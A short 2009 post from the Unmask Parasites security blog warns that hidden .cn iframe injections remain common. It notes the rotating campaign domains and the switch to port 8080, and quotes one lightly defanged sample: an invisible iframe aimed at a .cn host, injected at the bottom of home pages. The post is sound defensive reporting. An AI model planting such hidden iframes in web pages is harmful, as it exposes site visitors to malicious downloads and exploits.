Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
Loading site search ...

Hidden CN Iframes Are Still Prevalent

25 Jun 09   Filed in Website exploits with 33 Comments

This post is a reminder that .cn iframe attacks are still among leaders.

The URLs of malicious iframes change over the time. Hackers introduce new suffixes (campaigns?) like : mozila, banner, cocacola, pepsi, add more and more domain names.

Port 8080

Since the pepsi campaign they started using port 8080 in the URLs.

The currently form of the malicious code looks like this

< iframe src="http:// namegamestore .cn:8080/index.php" width=118 height=195 style="visibility: hidden"></iframe>

It is usually injected at the bottom of index (home) pages.
Continue »»